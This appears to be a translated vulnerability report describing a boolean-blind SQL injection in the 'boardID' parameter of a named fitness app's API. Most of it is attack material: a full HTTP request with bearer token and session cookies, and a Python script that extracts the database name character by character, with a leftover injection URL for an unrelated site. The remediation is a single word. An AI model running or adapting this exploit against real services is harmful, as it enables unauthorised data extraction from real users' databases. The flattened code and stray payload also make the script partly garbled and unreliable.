The SQL injection vulnerability exists in the official APP of codoon Network (cross-5 databases + with bypass verification scripts)

The SQL injection vulnerability exists in the official APP of codoon Network (cross-5 databases + with bypass verification scripts)

SQL Injection for APP security

Target: Official APP of codoon

Check that SQL Injection exists in the following places: (boardID and Boolean blind injection in POST)
 

POST /api/get_good_post HTTP/1.1Authorization: Bearer  48f9724bf93537d8f8fdc077858f086ctoken: valueContent-Type: application/jsonContent-Length: 109X-Requested-With: XMLHttpRequestReferer: http://api.codoon.com/api/get_good_postCookie: bduss=0JmPoJ58QRp09xPt_5AqCJ8xxMrrkvzN0k1bOkf8xMlcIvodpubYOkuH2olIivMi_av6o0NxSoJB93RGgu30MJ85SMJ48HOxlkSquliSSulqiSuqliS6ulioHu965maHliSquliqSulqiSuqliSquliqSulqiSuqliSquliqSulqiSuqliSquliqSulqiSuqliSquliqSulqiSuqliSquliqSulqiSuqliSquliqSulqiSuqraGFzgkvAj_3r3R7AHost: api.codoon.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*{"boardID":"9","count":20,"offset":0,"userID":"b14e1d1d-9dc3-4105-8b12-f02f0a94de91"}

Because of the filtering, SQLMap is not detected ...... So I manually wrote a Python: (running the current database name as an example, the program contains a proxy)
 

#!/usr/bin/env python#coding=utf8import httplib, urllib, re, timedatabase = ''temp_database = ''httpClient = Nonei = 33while i < 128:    if i == 37:        i = i+1    try:        params = '{"boardID":"9 AND database() like 0x'+temp_database+str(hex(i))[2:]+'25","count":20,"offset":0,"userID":"b14e1d1d-9dc3-4105-8b12-f02f0a94de91"}'        headers = {"Host": "api.codoon.com",                    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",                    "Accept-Encoding": "gzip,deflate",                    "Accept": "*/*",                    "Cookie": "JSESSIONID=4E4E004949665B956ADFF8315E7C3200",                    "Connection": "keep-alive",                    "Authorization": "Bearer  48f9724bf93537d8f8fdc077858f086c",                    "token": "value",                    "Content-Type": "application/json",                    "Content-Length": len(params)}        httpClient = httplib.HTTPConnection("192.168.222.202", 8080, timeout=3)        url = 'http://www.qk365.com/news//elive/infoRight_ajaxLink.do?siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&classPagemark=qkkx_yqlj%27%29%20AND%20(select%20GROUP_CONCAT(TABLE_NAME)%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=0x66726565636d73)%20like%200x'+temp_database+str(hex(i))[2:]+'25%20AND%20%28%27pJni%27=%27pJni&num=99'        httpClient.request("POST", "http://api.codoon.com/api/get_good_post", params, headers)        st = time.time()        response = httpClient.getresponse()        rp = response.read()        if len(rp) > 100:            temp_database = temp_database + str(hex(i))[2:]            database = database + chr(i)            print 'user(): ', database            i = 33        i=i+1            except Exception, e:        print e    finally:        if httpClient:            httpClient.close()

1. Run the current database user
 

2. Run the current database
 

3. Run out of all databases
 

4. Run the table of the current database
 

Other data can run out in the same way. Here, we only perform verification and will not go deep.

Solution:

Filter